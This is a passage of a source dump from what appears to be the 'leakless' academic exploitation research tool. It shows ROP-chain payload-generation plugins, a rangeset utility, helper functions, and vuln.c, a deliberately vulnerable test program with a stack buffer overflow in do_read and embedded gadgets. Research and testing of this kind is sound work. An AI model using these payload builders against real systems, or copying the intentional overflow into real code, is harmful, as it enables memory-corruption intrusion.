self.pointer_size * 2), invocation_start + self.pointer_size) 335 | 336 | result = invocation 337 | 338 | result += data 339 | 340 | return result 341 | #return location + self.ptr2str(0) + self.ptr2str(len(data)) + self.ptr2str(self.memcpy_plt) 342 | else: 343 | raise Exception("Unsupported architecture") 344 | 345 | 346 | def register_gadget_provider(): 347 | return [("rop-chain", CommonGadgetsExploit)] 348 | -------------------------------------------------------------------------------- /plugins/RawDumperExploit.py: -------------------------------------------------------------------------------- 1 | from exploit import Exploit 2 | 3 | class RawDumperExploit(Exploit): 4 | def __init__(self): 5 | Exploit.__init__(self) 6 | self.empty_exploit = lambda: [] 7 | 8 | def do_writemem(self, address, value): 9 | """Write a pointer-sized buffer to the specfied location.""" 10 | return "", [("write_constant", value, address, None)] 11 | 12 | def write_with_offset(self, pointer_address, offset, value): 13 | return [("write_with_offset", value, pointer_address, offset)] 14 | 15 | def deref_with_offset_and_save(self, pointer_address, offset, save_address): 16 | return [("deref_with_offset_and_save", save_address, pointer_address, offset)] 17 | 18 | def register_gadget_provider(): 19 | return [("dump", RawDumperExploit)] 20 | -------------------------------------------------------------------------------- /plugins/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ucsb-seclab/leakless/94c01b4b67b870b7fbe45a257f28498f5f4762d6/plugins/__init__.py -------------------------------------------------------------------------------- /rangeset.py: -------------------------------------------------------------------------------- 1 | """ 2 | This module provides a RangeSet data structure. A range set is, as the 3 | name implies, a set of ranges. Intuitively, you could think about a 4 | range set as a subset of the real number line, with arbitrary gaps. 5 | Some examples of range sets on the real number line: 6 | 7 | 1. -infinity to +infinity 8 | 2. -1 to 1 9 | 3. 1 to 4, 10 to 20 10 | 4. -infinity to 0, 10 to 20 11 | 5. (the empty set) 12 | 13 | The code lives on github at: https://github.com/axiak/py-rangeset. 14 | 15 | Overview 16 | ------------- 17 | 18 | .. toctree:: 19 | :maxdepth: 2 20 | 21 | 22 | The rangeset implementation offers immutable objects that represent the range 23 | sets as described above. The operations are largely similar to the 24 | `set object `_ with the 25 | obvious exception that mutating methods such as ``.add`` and ``.remove`` 26 | are not available. The main object is the ``RangeSet`` object. 
27 | """ 28 | 29 | import bisect 30 | import operator 31 | import functools 32 | import collections 33 | 34 | __version__ = (0, 0, 6) 35 | 36 | __all__ = ('INFINITY', 'NEGATIVE_INFINITY', 37 | 'RangeSet') 38 | 39 | _parent = collections.namedtuple('RangeSet_', ['ends']) 40 | 41 | class _Indeterminate(object): 42 | def timetuple(self): 43 | return () 44 | def __eq__(self, other): 45 | return other is self 46 | 47 | class _Infinity(_Indeterminate): 48 | def __lt__(self, other): 49 | return False 50 | def __gt__(self, other): 51 | return True 52 | def __str__(self): 53 | return 'inf' 54 | __repr__ = __str__ 55 | 56 | class _NegativeInfinity(_Indeterminate): 57 | def __lt__(self, other): 58 | return True 59 | def __gt__(self, other): 60 | return False 61 | def __str__(self): 62 | return '-inf' 63 | __repr__ = __str__ 64 | 65 | INFINITY = _Infinity() 66 | NEGATIVE_INFINITY = _NegativeInfinity() 67 | 68 | class RangeSet(_parent): 69 | def __new__(cls, start, end): 70 | if end is _RAW_ENDS: 71 | ends = start 72 | else: 73 | if isinstance(start, _Indeterminate) and isinstance(end, _Indeterminate) and \ 74 | start == end: 75 | raise LogicError("A range cannot consist of a single end the line.") 76 | if start > end: 77 | start, end = end, start 78 | ends = ((start, _START), (end, _END)) 79 | return _parent.__new__(cls, ends) 80 | 81 | def __merged_ends(self, *others): 82 | sorted_ends = list(self.ends) 83 | for other in others: 84 | sorted_ends.extend(RangeSet.__coerce(other).ends) 85 | sorted_ends.sort() 86 | return sorted_ends 87 | 88 | @classmethod 89 | def __coerce(cls, value): 90 | if isinstance(value, RangeSet): 91 | return value 92 | elif isinstance(value, tuple) and len(value) == 2: 93 | return cls(value[0], value[1]) 94 | else: 95 | return cls.mutual_union(*[(x, x) for x in value]) 96 | 97 | @classmethod 98 | def __iterate_state(cls, ends): 99 | state = 0 100 | for _, end in ends: 101 | if end == _START: 102 | state += 1 103 | else: 104 | state -= 1 105 | yield _, end, state 106 | 107 | def __or__(self, *other): 108 | sorted_ends = self.__merged_ends(*other) 109 | new_ends = [] 110 | for _, end, state in RangeSet.__iterate_state(sorted_ends): 111 | if state > 1 and end == _START: 112 | continue 113 | elif state > 0 and end == _END: 114 | continue 115 | new_ends.append((_, end)) 116 | return RangeSet(tuple(new_ends), _RAW_ENDS) 117 | 118 | union = __or__ 119 | 120 | def __and__(self, *other, **kwargs): 121 | min_overlap = kwargs.pop('minimum', 2) 122 | if kwargs: 123 | raise ValueError("kwargs is not empty: {0}".format(kwargs)) 124 | sorted_ends = self.__merged_ends(*other) 125 | new_ends = [] 126 | for _, end, state in RangeSet.__iterate_state(sorted_ends): 127 | if state == min_overlap and end == _START: 128 | new_ends.append((_, end)) 129 | elif state == (min_overlap - 1) and end == _END: 130 | new_ends.append((_, end)) 131 | return RangeSet(tuple(new_ends), _RAW_ENDS) 132 | 133 | intersect = __and__ 134 | 135 | def __ror__(self, other): 136 | return self.__or__(other) 137 | 138 | def __rand__(self, other): 139 | return self.__and__(other) 140 | 141 | def __rxor__(self, other): 142 | return self.__xor__(other) 143 | 144 | def __xor__(self, *other): 145 | sorted_ends = self.__merged_ends(*other) 146 | new_ends = [] 147 | old_val = None 148 | for _, end, state in RangeSet.__iterate_state(sorted_ends): 149 | if state == 2 and end == _START: 150 | new_ends.append((_, _NEGATE[end])) 151 | elif state == 1 and end == _END: 152 | new_ends.append((_, _NEGATE[end])) 153 | elif state == 1 and end == 
_START: 154 | new_ends.append((_, end)) 155 | elif state == 0 and end == _END: 156 | new_ends.append((_, end)) 157 | return RangeSet(tuple(new_ends), _RAW_ENDS) 158 | 159 | symmetric_difference = __xor__ 160 | 161 | def __contains__(self, test): 162 | last_val, last_end = None, None 163 | if not self.ends: 164 | return False 165 | if isinstance(test, _Indeterminate): 166 | return False 167 | for _, end, state in RangeSet.__iterate_state(self.ends): 168 | if _ == test: 169 | return True 170 | elif last_val is not None and _ > test: 171 | return last_end == _START 172 | elif _ > test: 173 | return False 174 | last_val, last_end = _, end 175 | return self.ends[-1][0] == test 176 | 177 | def issuperset(self, test): 178 | if isinstance(test, RangeSet): 179 | rangeset = test 180 | else: 181 | rangeset = RangeSet.__coerce(test) 182 | difference = rangeset - ~self 183 | return difference == rangeset 184 | 185 | __ge__ = issuperset 186 | 187 | def __gt__(self, other): 188 | return self != other and self >= other 189 | 190 | def issubset(self, other): 191 | return RangeSet.__coerce(other).issuperset(self) 192 | 193 | __le__ = issubset 194 | 195 | def __lt__(self, other): 196 | return self != other and self <= other 197 | 198 | def isdisjoint(self, other): 199 | return not bool(self & other) 200 | 201 | def __nonzero__(self): 202 | return bool(self.ends) 203 | 204 | def __invert__(self): 205 | if not self.ends: 206 | new_ends = ((NEGATIVE_INFINITY, _START), 207 | (INFINITY, _END)) 208 | return RangeSet(new_ends, _RAW_ENDS) 209 | new_ends = list(self.ends) 210 | head, tail = [], [] 211 | if new_ends[0][0] == NEGATIVE_INFINITY: 212 | new_ends.pop(0) 213 | else: 214 | head = [(NEGATIVE_INFINITY, _START)] 215 | if new_ends[-1][0] == INFINITY: 216 | new_ends.pop(-1) 217 | else: 218 | tail = [(INFINITY, _END)] 219 | for i, value in enumerate(new_ends): 220 | new_ends[i] = (value[0], _NEGATE[value[1]]) 221 | return RangeSet(tuple(head + new_ends + tail), _RAW_ENDS) 222 | 223 | 224 | invert = __invert__ 225 | 226 | def __sub__(self, other): 227 | return self & ~RangeSet.__coerce(other) 228 | 229 | def difference(self, other): 230 | return self.__sub__(other) 231 | 232 | def __rsub__(self, other): 233 | return RangeSet.__coerce(other) - self 234 | 235 | def measure(self): 236 | if not self.ends: 237 | return 0 238 | if isinstance(self.ends[0][0], _Indeterminate) or isinstance(self.ends[-1][0], _Indeterminate): 239 | raise ValueError("Cannot compute range with unlimited bounds.") 240 | return reduce(operator.add, (self.ends[i + 1][0] - self.ends[i][0] for i in range(0, len(self.ends), 2))) 241 | 242 | def range(self): 243 | if not self.ends: 244 | return 0 245 | if isinstance(self.ends[0][0], _Indeterminate) or isinstance(self.ends[-1][0], _Indeterminate): 246 | raise ValueError("Cannot compute range with unlimited bounds.") 247 | return self.ends[-1][0] - self.ends[0][0] 248 | 249 | def __str__(self): 250 | pieces = ["{0} -- {1}".format(self.ends[i][0], self.ends[i + 1][0]) 251 | for i in range(0, len(self.ends), 2)] 252 | return "".format(", ".join(pieces)) 253 | 254 | __repr__ = __str__ 255 | 256 | def __eq__(self, other): 257 | if self is other: 258 | return True 259 | elif not isinstance(other, RangeSet): 260 | try: 261 | other = RangeSet.__coerce(other) 262 | except TypeError: 263 | return False 264 | return self.ends == other.ends 265 | 266 | def __ne__(self, other): 267 | return not self.__eq__(other) 268 | 269 | def __hash__(self): 270 | return hash(self.ends) 271 | 272 | @classmethod 273 | def 
mutual_overlaps(cls, *ranges, **kwargs): 274 | minimum = kwargs.pop('minimum', 2) 275 | if kwargs: 276 | raise ValueError("kwargs is not empty: {0}".format(kwargs)) 277 | return cls.__coerce(ranges[0]).intersect(*ranges[1:], minimum=minimum) 278 | 279 | @classmethod 280 | def mutual_union(cls, *ranges): 281 | return cls.__coerce(ranges[0]).union(*ranges[1:]) 282 | 283 | @property 284 | def min(self): 285 | return self.ends[0][0] 286 | 287 | @property 288 | def max(self): 289 | return self.ends[-1][0] 290 | 291 | def __iter__(self): 292 | ends_copy = list(self.ends) 293 | for i in range(0, len(ends_copy), 2): 294 | yield (ends_copy[i][0], ends_copy[i + 1][0]) 295 | 296 | _START = -1 297 | _END = 1 298 | 299 | _NEGATE = {_START: _END, _END: _START} 300 | 301 | _RAW_ENDS = object() 302 | 303 | 304 | class LogicError(ValueError): 305 | pass 306 | -------------------------------------------------------------------------------- /utils.py: -------------------------------------------------------------------------------- 1 | import itertools 2 | import sys 3 | 4 | verbose = False 5 | 6 | def align(address, base, of): 7 | offset = (address - base) % of 8 | return address if offset == 0 else address + of - offset 9 | 10 | def hex_bytes(string): 11 | return "".join(map(lambda x: chr(int(x, 16)), filter(len, string.split(" ")))) 12 | 13 | def findall(sub, string, addend): 14 | index = 0 - 1 15 | try: 16 | while True: 17 | index = string.index(sub, index + 1) 18 | yield index + addend 19 | except ValueError: 20 | pass 21 | 22 | def find_all_strings(sections, string): 23 | result = [list(findall(string, section.data(), section.header.p_vaddr)) for section in sections if string in section.data()] 24 | return sum(result, []) 25 | 26 | def find_string(sections, string): 27 | result = [section.header.p_vaddr + section.data().index(string) for section in sections if string in section.data()] 28 | return first_or_none(result) 29 | 30 | def first_or_none(list): 31 | return list[0] if len(list) > 0 else None 32 | 33 | def log(string): 34 | if verbose: 35 | sys.stderr.write(string + "\n") 36 | 37 | def chunks(l, n): 38 | for i in xrange(0, len(l), n): 39 | yield l[i:i+n] 40 | 41 | def integer_to_bigendian(n): 42 | s = '%x' % n 43 | if len(s) & 1: 44 | s = '0' + s 45 | return s.decode('hex') 46 | 47 | def bigendian_to_integer(string): 48 | return string.encode("hex") 49 | 50 | def pairwise(iterable): 51 | "s -> (s0,s1), (s1,s2), (s2, s3), ..." 
52 | a, b = itertools.tee(iterable) 53 | next(b, None) 54 | return itertools.izip(a, b) 55 | 56 | def filter_none(list): 57 | return filter(lambda entry: entry is not None, list) 58 | 59 | def insert_and_replace(original, insert, offset): 60 | return original[:offset] + insert + original[offset + len(insert):] 61 | -------------------------------------------------------------------------------- /vuln.c: -------------------------------------------------------------------------------- 1 | // Don't include unistd.h otherwise a secure version of read will be used 2 | // #include 3 | 4 | // #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #if !defined(__x86_64__) && !defined(__i386__) 11 | # error "Unsupported architecture" 12 | #endif 13 | 14 | char put_me_in_bss[1024] = {0}; 15 | 16 | int play_with_stack(int i) { 17 | int *local = alloca(10); 18 | local[0] = 123; 19 | intptr_t memcpy_ptr = (intptr_t) memcpy; 20 | 21 | return local[i] + memcpy_ptr; 22 | } 23 | 24 | void add(int *a, int b) { 25 | *a += b; 26 | } 27 | 28 | void mem_to_mem(int *dst, int *src) { 29 | *dst = *src; 30 | } 31 | 32 | void writemem(void **in, void *val) { 33 | *in = val; 34 | } 35 | 36 | int do_read() { 37 | char buffer[100]; 38 | read(0, buffer, 10000); 39 | } 40 | 41 | void deref_and_write_with_offset() { 42 | #if defined(__x86_64__) 43 | __asm__("pop rax; pop rbx; pop rcx; mov rax,QWORD PTR [rax]; mov QWORD PTR [rax+rcx*1],rbx; ret;"); 44 | #elif defined(__i386__) 45 | __asm__("pop eax; pop ebx; pop ecx; mov eax,DWORD PTR [eax]; mov DWORD PTR [eax+ecx*1],ebx; ret;"); 46 | #endif 47 | } 48 | 49 | void deref_with_offset_and_save() { 50 | #if defined(__x86_64__) 51 | __asm__("pop rax; pop rbx; pop rcx; mov rax, [rax]; mov rax,QWORD PTR [rax+rbx]; mov QWORD PTR [rcx],rax; ret;"); 52 | #elif defined(__i386__) 53 | __asm__("pop eax; pop ebx; pop ecx; mov eax, [eax]; mov eax,DWORD PTR [eax+ebx]; mov DWORD PTR [ecx],eax; ret;"); 54 | #endif 55 | } 56 | 57 | void copy_to_stack() { 58 | #if defined(__x86_64__) 59 | __asm__("pop rbx; pop rcx; mov rbx, QWORD PTR [rbx]; mov QWORD PTR [rsp+rcx*1],rbx; ret;"); 60 | #elif defined(__i386__) 61 | __asm__("pop ebx; pop ecx; mov ebx, DWORD PTR [ebx]; mov DWORD PTR [esp+ecx*1],ebx; ret;"); 62 | #endif 63 | } 64 | 65 | void load_memcpy() { 66 | #if defined(__x86_64__) 67 | __asm__("pop rsi; add rsi,rsp; ret;"); 68 | __asm__("pop rax; add rsp,rax; ret;"); 69 | #elif defined(__i386__) 70 | __asm__("pop eax; pop esi; add esi,esp; mov DWORD PTR [esp+eax], esi; ret;"); 71 | __asm__("pop ebx; add esp,ebx; ret;"); 72 | #endif 73 | } 74 | 75 | void args() { 76 | #if defined(__x86_64__) 77 | __asm__("pop rdi; pop rsi; pop rdx; ret;"); 78 | #endif 79 | } 80 | 81 | int main() { 82 | do_read(); 83 | } 84 | --------------------------------------------------------------------------------
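Both plugin modules above expose a module-level `register_gadget_provider()` hook returning a list of `(name, class)` pairs, presumably how each strategy is made available to `exploit.py`. The skeleton below is a minimal sketch of a third provider following the same convention; `NopExploit`, its behaviour, and the file name are hypothetical, and the way `exploit.py` actually enumerates the `plugins` package is not shown in this section.

    # plugins/NopExploit.py (hypothetical) -- provider skeleton only
    from exploit import Exploit

    class NopExploit(Exploit):
        def __init__(self):
            Exploit.__init__(self)

        def do_writemem(self, address, value):
            """Drop every write: nothing remains to be written, empty payload."""
            return "", ""

    def register_gadget_provider():
        # Same shape as the providers above: a list of (method-name, class) pairs.
        return [("nop", NopExploit)]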
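The `rangeset` module's docstring describes range sets informally; a short usage sketch of the operations implemented above might look like this (Python 2, like the rest of the code base; the snippet is illustrative and not part of the repository):

    from rangeset import RangeSet, NEGATIVE_INFINITY

    a = RangeSet(1, 4) | RangeSet(10, 20)   # "1 to 4, 10 to 20"
    b = RangeSet(NEGATIVE_INFINITY, 0)      # "-infinity to 0"

    print 2 in a           # True: inside the 1..4 piece
    print 5 in a           # False: in the gap between the two pieces
    print a.measure()      # 13, i.e. (4 - 1) + (20 - 10)
    print list(a)          # [(1, 4), (10, 20)]
    print a.isdisjoint(b)  # True
    print (a | b).min      # -inf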
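A few helpers in `utils.py` are easier to follow with concrete values: `hex_bytes` turns the space-separated hex strings passed to `add_gadget` into raw bytes, `insert_and_replace` patches an already-built chain in place without changing its length (as the x86-64 branch of `memcpy` does above), `align` rounds an address up to the next aligned value relative to a base, and `findall` yields every occurrence of a substring, rebased by an addend. A small illustrative session (Python 2, not part of the repository):

    from utils import hex_bytes, insert_and_replace, align, findall

    print hex_bytes(" 48 89 37 c3") == "\x48\x89\x37\xc3"  # True: bytes of "mov [rdi],rsi; ret"
    print insert_and_replace("AAAABBBBCCCC", "XXXX", 4)     # AAAAXXXXCCCC (bytes 4..7 overwritten)
    print hex(align(0x1001, 0x1000, 0x10))                  # 0x1010
    print list(findall("ab", "xxabyyabzz", 0x1000))         # [4098, 4102], i.e. 0x1002 and 0x1006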